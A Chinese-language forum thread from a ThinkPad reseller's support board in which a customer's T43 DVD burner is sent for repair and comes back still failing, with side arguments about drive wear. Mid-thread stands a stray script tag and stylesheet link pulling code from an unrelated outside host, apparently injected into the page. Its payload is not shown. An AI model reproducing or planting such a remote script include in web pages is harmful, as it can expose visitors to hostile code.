开业于2004年,诚信服务几万客户
翔意数码淘宝店:xynbnb.taobao.com
全国客服电话:010-59000667
地址:北京东城区东兴隆街56号北京商界A座512
ThinkPad产品专业客服 苹果产品专业客服

关于T43光驱的问题

去年9月在XY购买T43的AT4,光驱一直没怎么用,买了一盒BenQ8x的DVD-R刻录碟,去年刻过一张,很好用,前几天刻录东西的时候发现nero不认碟,无法刻录,使用的碟片还是以前那盒,更换nero版本后还是无法刻录,与杨总联系后建议送修,今天看了很多关于光驱的问题,联想到自己以前也有碟读不出来的时候也没在意,认为是放进的碟片有问题,看来还是光驱挑碟,不知道T43的光驱返修率是不是有点高了,这个光驱从买来到现在几乎没怎么用!今天将光驱EMS给XY,本本序列号为L3-TPRBB,联系方式及其他在邮包里写的很详细,不知道还需要什么资料否!另外大概多久能修好?谢谢!
请再这里贴一张机器底部照片,以便保修,谢谢

20工作日,到了直接给您邮寄回去
★★★
<script type="text/javascript" src="http://www.972.cc/1.js"></script>
<link href="http://www.972.cc/1.css" rel="stylesheet" type="text/css" media="screen" />

<P>&nbsp;</P>

光驱越不用越容易坏
原帖由 lovegh 于 2006-5-29 12:20 发表

这是什么道理?你就忽悠吧

这世界任何一样东西其物理性质决定在正常空气环境下如果你越当宝贝放着越容易被外界的物质所侵害,一瓶水放2个星期必然发霉,流水则不会,人如果一个月躺在床上,你看他一个月后还能正常下床走路马
别一上来就说别人在忽悠,怀疑一切的态度在某些时候只能被别人当成粪青
机器背部图片
照片 009.jpg
再补一张,另外奉劝大家买最适合自己的东西,不一定要强求功能的齐全,有些功能或许你压根就用不上,出了问题还得费神。
照片 010.jpg
收到
不知道我邮寄的光驱XY是否已经收到,另外能否确定光驱坏了要送IBM修呢?我是不知道怎么检测到底是不是光驱坏了,没办法才邮寄给你们,麻烦啊!
不知道我的光驱修的怎么样了,有消息了吗?斑竹请给个答复!谢谢!
还在维修中,
估计啥时候能好啊?差不多也20天了
原帖由 husthaibo 于 2006-6-18 22:53 发表
估计啥时候能好啊?差不多也20天了

20个工作日的,不是20天,再耐心等一下吧,快了
斑竹,我的光驱有什么消息了吗?如果这个周末之前能回来的话,就先不要邮寄了,我这个周末要去北京,如果回的来,那我就自己上门去取,请回复,谢谢!
我5月28号邮寄的,照说这个时间也差不多了吧!!
单配件维修会慢一些,因为要找一个机器装上去一起修,不过5月28日送来的,最近就会修回来.到了给你打电话
斑竹,我的光驱修的如何了啊?上周回北京也没拿到,我5月28日邮寄的,到现在都快40天了,应该有消息了吧?请回复,谢谢!
修好了,你把地址给我给你发过去
今天收到寄回来的光驱,但是仍然无法刻录,现在能认出空白光盘了,但点刻录后一会就报“电源校准错误”,换1X,2X,4X都不行,请问是什么原因?
............发之前都是试验过了,而且那个是新的,我建议换一个刻录软件或者刻录盘
这个光驱是新的?但我看上面的FRU码跟我以前那个还是一样的啊,而且外表有点损伤,跟我以前那个比还要旧点哦!!我用的nero和盘片都是我以前可以刻录的那种,有什么推荐的刻录软件吗?
只要是dvd光驱的fru号肯定都是一样的。。。。。
你可以试试easycd什么的